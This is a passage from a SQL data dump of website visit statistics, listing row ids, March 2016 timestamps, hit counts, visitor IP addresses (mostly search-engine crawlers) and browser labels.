2,0,'66.249.78.151',''),(24967,1458674574,1,1,0,0,'51.255.65.38','other'),(24968,1458674607,1,0,1,0,'68.180.230.237',''),(24969,1458674766,1,1,0,0,'217.69.133.67','other'),(24970,1458674767,1,1,0,0,'217.69.133.218','other'),(24971,1458674843,1,1,0,0,'164.132.161.71','other'),(24972,1458675167,1,1,0,0,'217.69.143.70','other'),(24973,1458675283,11,0,11,0,'66.249.78.144',''),(24974,1458675364,1,0,1,0,'66.249.78.37',''),(24975,1458675487,1,1,0,0,'217.69.143.59','other'),(24976,1458677227,1,1,0,0,'151.80.31.104','other'),(24977,1458677493,1,1,0,0,'217.69.143.66','other'),(24978,1458677806,1,0,1,0,'66.249.66.162',''),(24979,1458677837,2,0,2,0,'66.249.66.166',''),(24980,1458678000,1,1,0,0,'217.69.143.46','other'),(24981,1458678040,1,1,0,0,'141.8.184.18','other'),(24982,1458678461,1,1,0,0,'141.8.132.99','other'),(24983,1458678500,1,1,0,0,'217.69.133.216','other'),(24984,1458678501,1,1,0,0,'217.69.133.85','other'),(24985,1458678874,1,1,0,0,'62.210.215.100','chrome'),(24986,1458678967,1,1,0,0,'151.80.31.166','other'),(24987,1458679009,5,5,0,0,'141.8.183.14','other'),(24988,1458679269,1,1,0,0,'217.69.133.221','other'),(24989,1458679382,1,0,1,0,'66.249.78.144',''),(24990,1458679427,1,0,1,0,'66.249.78.37',''),(24991,1458679662,2,2,0,0,'5.255.253.100','other'),(24992,1458679679,2,2,0,0,'141.8.132.99','other'),(24993,1458679716,3,3,0,0,'93.158.152.9','other'),(24994,1458679755,1,1,0,0,'130.193.37.21','other'),(24995,1458679758,1,1,0,0,'130.193.51.45','other'),(24996,1458679820,1,1,0,0,'141.8.184.18','other'),(24997,1458680352,1,1,0,0,'8.29.198.25','other'),(24998,1458680657,1,1,0,0,'217.69.143.67','other'),(24999,1458680701,1,1,0,0,'5.255.253.53','other'),(25000,1458680704,2,2,0,0,'93.158.152.9','other'),(25001,1458680772,1,0,1,0,'66.249.78.144',''),(25002,1458680888,1,1,0,0,'217.69.133.85','other'),(25003,1458681060,1,1,0,0,'217.69.143.68','other'),(25004,1458681118,2,0,2,0,'66.249.78.151',''),(25005,1458681218,1,1,0,0,'66.249.66.158','other'),(25006,1458681390,1,1,0,0,'141.8.184.18','other'),(25007,1458681393,1,1,0,0,'141.8.184.11','other'),(25008,1458681397,1,1,0,0,'130.193.37.27','other'),(25009,1458681716,1,0,1,0,'66.249.78.30',''),(25010,1458682017,3,3,0,0,'130.193.37.21','other'),(25011,1458682020,2,2,0,0,'178.154.149.11','other'),(25012,1458682031,1,1,0,0,'176.122.126.33','chrome'),(25013,1458682032,2,2,0,0,'141.8.132.99','other'),(25014,1458682040,3,3,0,0,'141.8.183.14','other'),(25015,1458682050,2,2,0,0,'130.193.51.43','other'),(25016,1458682064,2,2,0,0,'5.255.253.53','other'),(25017,1458682072,1,1,0,0,'5.255.253.100','other'),(25018,1458682443,1,0,1,0,'66.249.78.144',''),(25019,1458682795,1,1,0,0,'54.144.238.176','firefox'),(25020,1458683448,1,1,0,0,'151.80.31.100','other'),(25021,1458683494,1,1,0,0,'141.8.183.14','other'),(25022,1458683497,1,1,0,0,'141.8.142.60','other'),(25023,1458683502,1,1,0,0,'178.154.149.11','other'),(25024,1458683565,2,2,0,0,'217.69.133.219','other'),(25025,1458683621,1,1,0,0,'66.249.78.144','other'),(25026,1458684261,1,1,0,0,'217.69.133.68','other'),(25027,1458684383,1,1,0,0,'217.69.133.218','other'),(25028,1458684384,1,1,0,0,'217.69.133.215','other'),(25029,1458684713,1,1,0,0,'5.255.253.10','other'),(25030,1458685239,2,0,2,0,'66.249.78.151',''),(25031,1458685243,1,1,0,0,'217.69.143.62','other'),(25032,1458685264,1,1,0,0,'66.249.92.95','other'),(25033,1458685665,1,1,0,0,'217.69.133.224','other'),(25034,1458685797,1,1,0,0,'217.69.133.68','other'),(25035,1458685850,1,1,0,0,'66.249.78.158','other'),(25036,1458685855,1,1,0,0,'91.196.177.69','chrome'),(25037,1458686129,1,1,0,0,'178.154.149.11','other'),(25038,1458686578,1,1,0,0,'164.132.161.57','other'),(25039,1458686736,1,1,0,0,'217.69.143.65','other'),(25040,1458687292,2,0,2,0,'66.249.78.144',''),(25041,1458687316,1,1,0,0,'5.255.253.53','other'),(25042,1458687318,1,0,1,0,'66.249.66.166',''),(25043,1458687361,2,2,0,0,'66.249.78.30','other'),(25044,1458687688,3,3,0,0,'141.8.183.14','other'),(25045,1458687691,4,4,0,0,'141.8.184.18','other'),(25046,1458687696,3,3,0,0,'178.154.149.11','other'),(25047,1458687730,1,1,0,0,'93.158.152.9','other'),(25048,1458687734,1,1,0,0,'130.193.37.21','other'),(25049,1458688043,1,1,0,0,'66.249.78.158','other'),(25050,1458688066,2,2,0,0,'66.249.78.151','other'),(25051,1458688077,5,4,1,0,'66.249.78.144',''),(25052,1458688283,2,1,1,0,'66.249.78.144',''),(25053,1458688367,1,1,0,0,'217.69.133.84','other'),(25054,1458688368,1,1,0,0,'217.69.133.216','other'),(25055,1458688728,1,0,1,0,'66.249.66.166',''),(25056,1458689236,1,0,1,0,'66.249.78.158',''),(25057,1458689570,1,1,0,0,'66.249.78.37','other'),(25058,1458690389,1,0,1,0,'66.249.78.158',''),(25059,1458690398,2,0,2,0,'66.249.78.144',''),(25060,1458690490,1,0,1,0,'66.249.78.151',''),(25061,1458690538,1,0,1,0,'66.249.66.158',''),(25062,1458691301,1,1,0,0,'8.29.198.25','other'),(25063,1458691525,1,1,0,0,'217.69.133.84','other'),(25064,1458691989,1,1,0,0,'141.8.142.8','other'),(25065,1458691994,1,1,0,0,'130.193.51.45','other'),(25066,1458692030,1,1,0,0,'217.69.143.64','other'),(25067,1458692486,1,1,0,0,'217.69.133.226','other'),(25068,1458692617,1,1,0,0,'51.255.65.2','other'),(25069,1458693226,1,1,0,0,'164.132.161.6','other'),(25070,1458693667,1,1,0,0,'217.69.133.85','other'),(25072,1458693926,1,1,0,0,'217.69.143.56','other'),(25073,1458694017,1,1,0,0,'164.132.161.38','other'),(25074,1458694049,1,1,0,0,'217.69.133.21','other'),(25075,1458694253,1,0,1,0,'66.249.66.162',''),(25076,1458694278,1,0,1,0,'66.249.78.151',''),(25077,1458694391,1,0,1,0,'66.249.66.158',''),(25078,1458694414,1,1,0,0,'164.132.161.91','other'),(25079,1458694605,1,1,0,0,'217.69.133.5','other'),(25080,1458694919,1,1,0,0,'180.76.15.149','other'),(25081,1458695343,1,1,0,0,'217.69.133.250','other'),(25082,1458695582,2,1,1,0,'66.249.78.151',''),(25083,1458695672,1,0,1,0,'66.249.78.30',''),(25084,1458695689,3,3,0,0,'141.8.184.18','other'),(25085,1458695693,1,1,0,0,'141.8.132.99','other'),(25086,1458695698,1,1,0,0,'93.158.152.9','other'),(25087,1458695711,1,1,0,0,'5.255.253.100','other'),(25088,1458695728,4,0,4,0,'66.249.78.144',''),(25089,1458695791,1,1,0,0,'5.255.253.53','other'),(25090,1458696132,1,1,0,0,'66.249.92.99','other'),(25091,1458696157,1,1,0,0,'151.80.31.179','other'),(25092,1458697014,1,1,0,0,'217.69.133.219','other'),(25093,1458697265,1,1,0,0,'151.80.31.180','other'),(25094,1458697344,1,1,0,0,'217.69.133.67','other'),(25095,1458697418,1,1,0,0,'91.210.145.194','chrome'),(25096,1458697501,1,1,0,0,'157.55.39.157','other'),(25097,1458697687,1,1,0,0,'217.69.143.67','other'),(25098,1458697857,1,1,0,0,'66.249.78.151','other'),(25099,1458698569,1,1,0,0,'51.255.65.3','other'),(25100,1458699162,1,0,1,0,'66.249.78.44',''),(25101,1458699687,1,1,0,0,'151.80.31.156','other'),(25102,1458699835,1,1,0,0,'217.69.143.62','other'),(25103,1458699847,1,1,0,0,'217.69.143.68','other'),(25104,1458700897,1,1,0,0,'217.69.133.67','other'),(25105,1458701054,1,0,1,0,'66.249.78.151',''),(25106,1458701690,1,1,0,0,'217.69.133.226','other'),(25107,1458702112,1,1,0,0,'8.29.198.25','other'),(25108,1458702157,1,1,0,0,'217.69.136.204','other'),(25109,1458702513,1,1,0,0,'217.69.143.54','other'),(25110,1458702552,1,1,0,0,'217.69.133.218','other'),(25111,1458702553,1,1,0,0,'217.69.133.85','other'),(25112,1458702881,1,0,1,0,'68.180.229.103',''),(25113,1458703240,1,0,1,0,'66.249.66.166',''),(25114,1458703424,1,1,0,0,'217.69.143.43','other'),(25115,1458703960,1,1,0,0,'217.69.143.49','other'),(25116,1458703961,1,1,0,0,'217.69.143.47','other'),(25117,1458704606,151,151,0,0,'94.154.239.69','other'),(25118,1458705613,1,1,0,0,'66.249.78.158','other'),(25119,1458706441,1,1,0,0,'217.69.133.85','other'),(25120,1458706861,1,1,0,0,'217.69.143.59','other'),(25121,1458707031,1,1,0,0,'66.249.92.99','other'),(25122,1458707273,1,1,0,0,'164.132.161.81','other'),(25123,1458707720,1,1,0,0,'66.249.66.158','other'),(25124,1458707738,1,1,0,0,'217.69.143.70','other'),(25125,1458707739,1,1,0,0,'217.69.143.69','other'),(25126,1458707813,1,0,1,0,'66.249.78.144',''),(25127,1458707860,1,1,0,0,'82.193.127.15','other'),(25128,1458708067,1,1,0,0,'130.193.51.43','other'),(25130,1458708071,1,1,0,0,'5.255.253.53','other'),(25131,1458708233,1,1,0,0,'217.69.133.222','other'),(25132,1458708792,1,1,0,0,'51.255.65.86','other'),(25133,1458708833,1,1,0,0,'141.8.184.18','other'),(25134,1458709176,2,2,0,0,'66.249.78.151','other'),(25135,1458709188,1,1,0,0,'151.80.31.164','other'),(25136,1458709320,1,1,0,0,'157.55.39.76','other'),(25137,1458709351,1,1,0,0,'51.255.65.60','other'),(25138,1458709411,1,1,0,0,'164.132.161.84','other'),(25139,1458709467,1,1,0,0,'164.132.161.5','other'),(25140,1458709541,1,1,0,0,'66.249.78.37','other'),(25141,1458709554,1,1,0,0,'66.249.78.30','other'),(25142,1458709621,1,1,0,0,'93.158.152.9','other'),(25143,1458709622,4,4,0,0,'94.154.239.69','other'),(25144,1458709667,1,1,0,0,'130.193.37.21','other'),(25145,1458709671,3,3,0,0,'141.8.183.14','other'),(25146,1458709675,1,1,0,0,'178.154.149.11','other'),(25147,1458709758,1,1,0,0,'66.249.78.158','other'),(25148,1458710266,2,0,2,0,'66.249.78.151',''),(25149,1458710405,1,1,0,0,'141.8.132.99','other'),(25150,1458710418,1,1,0,0,'51.255.65.11','other'),(25151,1458710475,1,1,0,0,'91.196.178.133','chrome'),(25152,1458710724,1,1,0,0,'66.249.78.158','other'),(25153,1458710911,1,0,1,0,'66.249.78.144',''),(25154,1458710945,2,2,0,0,'93.158.152.9','other'),(25155,1458710992,1,0,1,0,'66.249.66.166',''),(25156,1458711334,1,1,0,0,'66.249.66.162','other'),(25157,1458711541,1,1,0,0,'217.69.143.50','other'),(25158,1458711584,1,1,0,0,'101.226.168.249','chrome'),(25159,1458711727,2,2,0,0,'178.154.149.11','other'),(25160,1458711809,1,0,1,0,'66.249.78.151',''),(25161,1458712164,1,1,0,0,'31.11.133.66','chrome'),(25162,1458712267,2,2,0,0,'141.8.183.14','other'),(25163,1458712271,5,5,0,0,'141.8.184.18','other'),(25164,1458712343,1,1,0,0,'66.249.78.151','other'),(25165,1458712731,1,1,0,0,'130.193.37.21','other'),(25166,1458712787,1,1,0,0,'5.255.253.53','other'),(25167,1458712875,1,1,0,0,'217.69.133.219','other'),(25168,1458712919,1,0,1,0,'66.249.78.158',''),(25169,1458712921,1,1,0,0,'8.29.198.26','other'),(25170,1458713074,1,1,0,0,'176.241.109.84','firefox'),(25171,1458713262,2,2,0,0,'66.249.78.144','other'),(25172,1458713374,1,1,0,0,'217.69.143.70','other'),(25173,1458713487,2,2,0,0,'141.8.183.14','other'),(25174,1458713491,1,1,0,0,'141.8.184.18','other'),(25175,1458713518,1,1,0,0,'91.196.178.69','chrome'),(25176,1458713533,1,1,0,0,'95.133.238.173','chrome'),(25177,1458713541,2,1,1,0,'66.249.78.151',''),(25178,1458713792,1,1,0,0,'94.179.1.184','firefox'),(25179,1458713820,1,1,0,0,'51.255.65.62','other'),(25180,1458713946,1,1,0,0,'91.196.178.67','chrome'),(25181,1458714028,1,1,0,0,'95.132.89.163','opera'),(25182,1458714109,1,0,1,0,'66.249.78.30',''),(25183,1458714150,1,1,0,0,'5.255.253.53','other'),(25184,1458714159,1,1,0,0,'178.154.149.11','other'),(25185,1458714189,1,0,1,0,'66.249.78.44',''),(25186,1458714548,1,1,0,0,'141.8.132.99','other'),(25187,1458714756,1,1,0,0,'51.255.65.22','other'),(25188,1458714794,1,1,0,0,'62.210.215.100','chrome'),(25189,1458714972,1,1,0,0,'178.92.2.87','chrome'),(25190,1458714976,1,1,0,0,'82.193.127.15','other'),(25191,1458715130,1,1,0,0,'94.179.1.184','firefox'),(25192,1458715156,1,0,1,0,'66.249.66.166',''),(25193,1458715213,2,2,0,0,'217.69.133.222','other'),(25194,1458715243,1,1,0,0,'178.154.149.11','other'),(25195,1458715361,1,1,0,0,'66.249.78.151','other'),(25196,1458715393,1,1,0,0,'91.196.178.69','firefox'),(25197,1458715616,1,1,0,0,'151.80.31.165','other'),(25198,1458715727,1,1,0,0,'141.8.142.88','other'),(25199,1458715780,1,1,0,0,'130.193.51.81','other'),(25200,1458715784,2,2,0,0,'93.158.152.9','other'),(25201,1458715811,1,1,0,0,'91.196.178.72','firefox'),(25202,1458715859,5,5,0,0,'51.255.207.3','other'),(25203,1458716480,1,1,0,0,'141.8.184.18','other'),(25204,1458716588,1,1,0,0,'151.80.31.157','other'),(25205,1458716747,1,1,0,0,'66.249.93.114','chrome'),(25206,1458716943,2,2,0,0,'66.249.78.151','other'),(25207,1458717259,3,3,0,0,'178.154.149.11','other'),(25208,1458717451,10,10,0,0,'66.249.78.144','other'),(25209,1458717540,1,1,0,0,'217.69.133.84','other'),(25210,1458717569,2,2,0,0,'141.8.184.18','other'),(25211,1458717578,3,3,0,0,'141.8.183.14','other'),(25212,1458717630,1,1,0,0,'66.249.78.158','other'),(25213,1458717671,1,0,1,0,'66.249.66.162',''),(25214,1458717897,1,1,0,0,'78.111.185.69','firefox'),(25215,1458717912,3,3,0,0,'66.249.66.158','other'),(25216,1458717976,1,1,0,0,'178.95.232.180','chrome'),(25217,1458718002,1,0,1,0,'66.249.78.44',''),(25218,1458718011,1,1,0,0,'92.113.217.179','chrome'),(25219,1458718043,1,1,0,0,'66.249.92.95','other'),(25220,1458718144,1,1,0,0,'164.132.161.71','other'),(25221,1458718282,2,2,0,0,'141.8.132.99','other'),(25222,1458718408,1,1,0,0,'109.108.88.38','firefox'),(25224,1458718409,1,1,0,0,'217.69.133.221','other'),(25225,1458718569,2,1,1,0,'66.249.78.158',''),(25226,1458719053,1,1,0,0,'141.8.184.18','other'),(25227,1458719058,1,1,0,0,'93.158.152.9','other'),(25228,1458719234,1,1,0,0,'164.132.161.69','other'),(25229,1458719559,1,0,1,0,'66.249.78.158',''),(25230,1458719873,1,1,0,0,'217.69.136.204','other'),(25231,1458719974,1,1,0,0,'51.255.65.73','other'),(25232,1458720098,1,1,0,0,'94.179.15.217','chrome'),(25233,1458720164,35,35,0,0,'157.55.39.157','other'),(25234,1458720234,23,23,0,0,'157.55.39.76','other'),(25235,1458720537,1,1,0,0,'178.154.149.11','other'),(25236,1458720699,1,0,1,0,'66.249.78.144',''),(25237,1458720732,1,1,0,0,'217.69.143.57','other'),(25238,1458720735,1,1,0,0,'91.196.178.129','firefox'),(25239,1458720938,1,1,0,0,'217.69.143.42','other'),(25240,1458721368,1,1,0,0,'91.196.178.133','chrome'),(25241,1458721442,1,1,0,0,'141.8.184.18','other'),(25242,1458721459,1,1,0,0,'216.163.188.229','firefox'),(25243,1458721806,1,1,0,0,'93.158.152.9','other'),(25244,1458721810,1,1,0,0,'141.8.183.14','other'),(25245,1458721896,1,1,0,0,'66.249.78.151','other'),(25246,1458722378,2,2,0,0,'91.196.178.133','chrome'),(25247,1458722678,1,1,0,0,'93.73.237.254','firefox'),(25248,1458722799,1,1,0,0,'217.69.143.43','other'),(25249,1458722829,1,1,0,0,'207.46.13.135','other'),(25250,1458722850,1,1,0,0,'217.69.133.219','other'),(25251,1458722905,2,2,0,0,'178.154.149.11','other'),(25252,1458723098,1,1,0,0,'164.132.161.27','other'),(25253,1458723120,1,0,1,0,'66.249.78.158',''),(25254,1458723132,1,1,0,0,'217.69.133.229','other'),(25255,1458723192,1,0,1,0,'66.249.78.151',''),(25256,1458723271,2,0,2,0,'66.249.78.144',''),(25257,1458723348,1,1,0,0,'66.102.9.84','chrome'),(25258,1458723350,1,1,0,0,'92.112.27.32','chrome'),(25259,1458723584,3,3,0,0,'141.8.184.18','other'),(25260,1458723635,2,2,0,0,'91.196.178.67','chrome'),(25261,1458723748,1,1,0,0,'141.8.183.14','other'),(25262,1458723752,1,1,0,0,'93.158.152.9','other'),(25263,1458723805,1,1,0,0,'8.29.198.25','other'),(25264,1458724089,1,1,0,0,'91.196.178.133','chrome'),(25265,1458724330,1,1,0,0,'176.120.62.191','chrome'),(25266,1458724684,1,0,1,0,'66.249.78.151',''),(25267,1458724723,1,1,0,0,'141.8.184.18','other'),(25268,1458724925,1,0,1,0,'66.249.78.144',''),(25269,1458724935,1,1,0,0,'51.255.65.64','other'),(25270,1458724972,1,1,0,0,'46.200.97.37','chrome'),(25271,1458725148,1,1,0,0,'157.55.39.252','other'),(25272,1458725961,1,1,0,0,'5.255.253.100','other'),(25273,1458725966,1,1,0,0,'141.8.132.44','other'),(25274,1458726301,1,1,0,0,'180.76.15.159','other'),(25275,1458726519,1,1,0,0,'217.69.143.49','other'),(25276,1458726842,1,1,0,0,'217.69.133.59','other'),(25277,1458726887,1,1,0,0,'151.80.31.103','other'),(25278,1458727004,1,1,0,0,'217.69.133.67','other'),(25280,1458727115,1,1,0,0,'207.46.13.162','other'),(25281,1458727174,1,1,0,0,'5.255.253.9','other'),(25282,1458727178,1,1,0,0,'93.158.152.9','other'),(25283,1458727909,1,1,0,0,'66.249.78.37','other'),(25284,1458727990,1,1,0,0,'217.69.143.55','other'),(25285,1458728075,1,1,0,0,'109.108.88.38','firefox'),(25286,1458728169,1,0,1,0,'66.249.78.30',''),(25287,1458728429,1,1,0,0,'66.249.78.158','other'),(25288,1458728489,1,1,0,0,'141.8.132.79','other'),(25289,1458728493,1,1,0,0,'130.193.51.102','other'),(25290,1458728498,1,1,0,0,'141.8.132.99','other'),(25291,1458728729,1,1,0,0,'94.179.1.12','chrome'),(25292,1458728900,1,1,0,0,'164.132.161.25','other'),(25293,1458728914,1,1,0,0,'66.249.92.99','other'),(25294,1458729035,1,1,0,0,'164.132.161.60','other'),(25295,1458729414,1,1,0,0,'40.77.167.51','other'),(25296,1458729482,1,1,0,0,'151.80.31.173','other'),(25297,1458729550,1,1,0,0,'217.69.143.53','other'),(25298,1458729615,1,0,1,0,'66.249.66.133',''),(25299,1458729642,2,0,2,0,'66.249.78.30',''),(25300,1458729979,1,1,0,0,'217.69.133.217','other'),(25301,1458730106,1,1,0,0,'130.193.51.102','other'),(25302,1458730110,1,1,0,0,'130.193.37.27','other'),(25303,1458730697,1,0,1,0,'66.249.78.151',''),(25304,1458730752,1,1,0,0,'66.249.78.37','other'),(25305,1458730875,1,1,0,0,'217.69.133.223','other'),(25306,1458730906,1,1,0,0,'51.255.65.33','other'),(25307,1458731343,1,1,0,0,'141.8.132.2','other'),(25308,1458731347,1,1,0,0,'141.8.142.82','other'),(25309,1458731511,1,1,0,0,'91.196.178.33','chrome'),(25310,1458731525,1,1,0,0,'157.55.39.157','other'),(25311,1458731963,1,1,0,0,'151.80.31.109','other'),(25312,1458731993,1,1,0,0,'151.80.31.107','other'),(25313,1458732007,271,271,0,0,'178.151.143.163','other'),(25314,1458732117,1,1,0,0,'130.193.50.31','other'),(25315,1458732120,1,1,0,0,'130.193.50.22','other'),(25316,1458732125,1,1,0,0,'130.193.51.91','other'),(25317,1458732129,1,1,0,0,'130.193.51.55','other'),(25318,1458732134,1,1,0,0,'141.8.132.76','other'),(25319,1458732138,1,1,0,0,'130.193.51.102','other'),(25320,1458732143,1,1,0,0,'141.8.132.99','other'),(25321,1458732147,1,1,0,0,'5.255.253.30','other'),(25322,1458732152,1,1,0,0,'5.255.253.10','other'),(25323,1458732156,1,1,0,0,'130.193.51.85','other'),(25324,1458732284,1,0,1,0,'66.249.66.158',''),(25325,1458732293,1,1,0,0,'66.249.78.144','other'),(25326,1458732383,1,1,0,0,'51.255.65.49','other'),(25327,1458732444,1,1,0,0,'151.80.31.178','other'),(25328,1458732659,1,1,0,0,'91.196.178.68','firefox'),(25329,1458732755,1,1,0,0,'40.77.167.51','other'),(25330,1458732845,1,1,0,0,'157.55.39.157','other'),(25331,1458732863,1,1,0,0,'62.210.215.100','chrome'),(25332,1458733050,1,1,0,0,'85.115.62.180','other'),(25333,1458733148,1,1,0,0,'95.132.10.240','firefox'),(25334,1458733509,1,1,0,0,'217.69.143.67','other'),(25335,1458733567,1,0,1,0,'66.249.78.151',''),(25336,1458733857,1,1,0,0,'185.8.41.211','chrome'),(25337,1458734137,1,1,0,0,'91.196.123.162','firefox'),(25338,1458734156,1,1,0,0,'217.69.133.67','other'),(25339,1458734179,1,1,0,0,'51.255.65.91','other'),(25340,1458734219,1,1,0,0,'130.193.51.81','other'),(25341,1458734262,1,0,1,0,'66.249.66.166',''),(25342,1458734527,1,1,0,0,'66.249.93.114','chrome'),(25343,1458734631,1,1,0,0,'91.196.178.69','firefox'),(25344,1458734662,1,1,0,0,'8.29.198.25','other'),(25345,1458734745,1,1,0,0,'40.77.167.51','other'),(25346,1458735080,1,1,0,0,'164.132.161.54','other'),(25347,1458735102,1,1,0,0,'66.249.78.30','other'),(25348,1458735531,1,1,0,0,'164.132.161.37','other'),(25349,1458735928,1,1,0,0,'217.69.143.66','other'),(25350,1458736025,1,1,0,0,'40.77.167.51','other'),(25351,1458736144,1,0,1,0,'66.249.66.166',''),(25352,1458736617,1,1,0,0,'95.134.224.186','chrome'),(25353,1458736890,1,1,0,0,'217.69.133.85','other'),(25354,1458737211,1,1,0,0,'212.22.195.15','firefox'),(25355,1458737254,1,0,1,0,'66.249.78.158',''),(25356,1458737561,1,1,0,0,'46.200.104.155','firefox'),(25357,1458737634,1,1,0,0,'217.69.143.54','other'),(25358,1458737781,1,1,0,0,'66.249.83.229','chrome'),(25359,1458737796,2,2,0,0,'66.249.83.222','chrome'),(25360,1458737918,1,0,1,0,'66.249.78.151',''),(25361,1458737941,1,1,0,0,'157.55.39.39','other'),(25362,1458737972,1,1,0,0,'95.134.224.186','chrome'),(25363,1458737986,1,0,1,0,'66.249.66.162',''),(25364,1458738039,1,0,1,0,'66.249.66.129',''),(25365,1458738309,1,1,0,0,'37.9.122.203','other'),(25366,1458738430,1,1,0,0,'178.93.150.9','chrome'),(25367,1458738431,1,1,0,0,'178.93.148.188','chrome'),(25368,1458738452,3,0,3,0,'66.249.78.158',''),(25369,1458738655,1,1,0,0,'66.249.78.158','other'),(25370,1458738890,1,1,0,0,'40.77.167.51','other'),(25371,1458739068,1,1,0,0,'217.69.133.219','other'),(25372,1458739278,1,1,0,0,'217.69.143.58','other'),(25373,1458739379,1,0,1,0,'66.249.78.144',''),(25374,1458739743,2,2,0,0,'91.196.178.67','firefox'),(25375,1458740154,1,1,0,0,'66.249.89.87','other'),(25376,1458740167,1,1,0,0,'217.69.133.12','other'),(25377,1458740168,1,1,0,0,'217.69.133.15','other'),(25378,1458740437,1,1,0,0,'157.55.39.157','other'),(25379,1458740529,1,1,0,0,'178.92.171.89','chrome'),(25380,1458740612,1,1,0,0,'94.179.117.129','chrome'),(25381,1458740628,1,1,0,0,'180.76.15.26','other'),(25382,1458740900,2,2,0,0,'217.69.143.45','other'),(25383,1458740924,1,1,0,0,'51.255.65.44','other'),(25384,1458741468,1,1,0,0,'217.69.136.210','other'),(25385,1458741812,1,1,0,0,'82.207.49.58','chrome'),(25386,1458741882,1,1,0,0,'78.111.185.25','chrome'),(25387,1458741965,1,1,0,0,'37.54.18.122','chrome'),(25388,1458743667,1,1,0,0,'164.132.161.32','other'),(25389,1458743795,12,12,0,0,'157.55.39.157','other'),(25390,1458743907,6,6,0,0,'157.55.39.76','other'),(25391,1458743977,1,1,0,0,'180.76.15.25','other'),(25392,1458744008,1,1,0,0,'180.76.15.6','other'),(25393,1458744358,1,1,0,0,'51.255.65.3','other'),(25394,1458746729,1,1,0,0,'180.76.15.16','other'),(25395,1458747425,1,1,0,0,'164.132.161.88','other'),(25396,1458747574,1,1,0,0,'157.55.39.76','other'),(25397,1458747722,1,1,0,0,'164.132.161.36','other'),(25398,1458747785,1,1,0,0,'180.76.15.155','other'),(25399,1458751743,1,1,0,0,'51.255.65.33','other'),(25400,1458752402,1,1,0,0,'180.76.15.143','other'),(25401,1458753293,1,1,0,0,'151.80.31.165','other'),(25402,1458754062,1,1,0,0,'51.255.65.4','other'),(25403,1458756603,1,1,0,0,'51.255.65.33','other'),(25404,1458756616,1,1,0,0,'164.132.161.61','other'),(25405,1458757145,1,1,0,0,'51.255.65.49','other'),(25406,1458759345,1,1,0,0,'151.80.31.173','other'),(25407,1458759752,1,1,0,0,'51.255.65.53','other'),(25408,1458762907,1,1,0,0,'51.255.65.94','other'),(25409,1458764059,1,1,0,0,'164.132.161.32','other'),(25410,1458765107,1,1,0,0,'64.246.165.190','firefox'),(25411,1458768300,1,1,0,0,'51.255.65.33','other'),(25412,1458768983,1,1,0,0,'164.132.161.26','other'),(25413,1458769383,1,1,0,0,'51.255.65.76','other'),(25414,1458772066,1,1,0,0,'51.255.65.21','other'),(25415,1458772238,1,1,0,0,'51.255.65.40','other'),(25416,1458777509,1,1,0,0,'164.132.161.72','other'),(25417,1458778661,1,1,0,0,'164.132.161.30','other'),(25418,1458779914,1,1,0,0,'51.255.65.59','other'),(25419,1458782531,1,1,0,0,'164.132.161.61','other'),(25420,1458784387,1,1,0,0,'164.132.161.51','other'),(25421,1458785791,1,1,0,0,'51.255.65.80','other'),(25422,1458789729,1,1,0,0,'164.132.161.78','other'),(25423,1458792137,1,1,0,0,'164.132.161.18','other'),(25424,1458792207,1,1,0,0,'164.132.161.28','other'),(25425,1458792666,1,1,0,0,'51.255.65.80','other'),(25426,1458792777,1,1,0,0,'151.80.31.106','other'),(25427,1458792876,1,1,0,0,'51.255.65.46','other'),(25428,1458794741,1,1,0,0,'164.132.161.3','other'),(25429,1458795240,1,1,0,0,'51.255.65.64','other'),(25430,1458797579,1,1,0,0,'51.255.65.46','other'),(25431,1458798550,1,1,0,0,'51.255.65.72','other'),(25432,1458799578,1,1,0,0,'164.132.161.69','other'),(25433,1458803323,1,1,0,0,'164.132.161.73','other'),(25434,1458804438,1,1,0,0,'51.255.65.44','other'),(25435,1458804564,1,1,0,0,'164.132.161.19','other'),(25436,1458804814,1,1,0,0,'51.255.65.85','other'),(25437,1458809689,1,1,0,0,'51.255.65.11','other'),(25438,1458810081,1,1,0,0,'51.255.65.15','other'),(25439,1458816453,1,1,0,0,'66.249.64.223','other'),(25440,1458816469,2,2,0,0,'78.111.185.45','other'),(25441,1458816521,1,1,0,0,'91.196.178.72','firefox'),(25442,1458816733,1,0,1,0,'66.249.64.233',''),(25443,1458816757,1,1,0,0,'217.69.133.85','other'),(25444,1458816801,1,1,0,0,'217.69.143.71','other'),(25445,1458816902,1,0,1,0,'66.249.64.162',''),(25446,1458817143,1,1,0,0,'66.249.69.150','other'),(25447,1458817461,1,1,0,0,'91.196.178.72','firefox'),(25448,1458817470,1,1,0,0,'91.196.178.162','chrome'),(25449,1458817595,1,1,0,0,'37.53.205.59','chrome'),(25450,1458817788,1,1,0,0,'217.69.133.224','other'),(25451,1458817874,1,0,1,0,'66.249.66.80',''),(25452,1458817895,1,0,1,0,'66.249.78.65',''),(25453,1458818154,1,1,0,0,'217.69.143.55','other'),(25454,1458818191,1,1,0,0,'217.69.133.229','other'),(25455,1458818314,1,0,1,0,'66.249.78.51',''),(25456,1458818455,1,1,0,0,'91.196.178.162','chrome'),(25457,1458818553,1,1,0,0,'217.69.143.43','other'),(25458,1458818735,1,1,0,0,'217.69.133.215','other'),(25459,1458818736,1,1,0,0,'217.69.133.85','other'),(25460,1458818836,1,1,0,0,'66.249.78.51','other'),(25461,1458818965,1,1,0,0,'91.196.178.69','firefox'),(25462,1458819036,1,0,1,0,'66.249.66.50',''),(25463,1458819318,1,1,0,0,'40.77.167.33','other'),(25464,1458819455,3,3,0,0,'62.210.107.201','other'),(25465,1458819485,3,3,0,0,'69.30.198.186','other'),(25466,1458819827,1,1,0,0,'217.69.133.85','other'),(25467,1458819839,1,1,0,0,'66.249.66.50','other'),(25468,1458820053,5,5,0,0,'176.9.10.227','other'),(25469,1458820124,1,1,0,0,'91.205.66.134','chrome'),(25470,1458820318,1,1,0,0,'157.55.39.173','other'),(25471,1458820530,1,1,0,0,'91.196.178.69','chrome'),(25472,1458821254,1,1,0,0,'217.69.133.215','other'),(25473,1458821502,1,0,1,0,'66.249.78.51',''),(25474,1458821766,1,1,0,0,'217.69.143.62','other'),(25475,1458821797,1,1,0,0,'180.76.15.15','other'),(25476,1458821807,1,1,0,0,'217.69.143.43','other'),(25477,1458821834,1,1,0,0,'141.8.142.61','other'),(25478,1458821836,1,1,0,0,'141.8.142.67','other'),(25479,1458821838,1,1,0,0,'93.158.152.84','other'),(25480,1458821840,1,1,0,0,'141.8.183.19','other'),(25481,1458821842,1,1,0,0,'130.193.51.79','other'),(25482,1458821844,1,1,0,0,'141.8.132.10','other'),(25483,1458821847,1,1,0,0,'130.193.50.6','other'),(25484,1458822075,1,1,0,0,'217.69.133.84','other'),(25485,1458822140,1,1,0,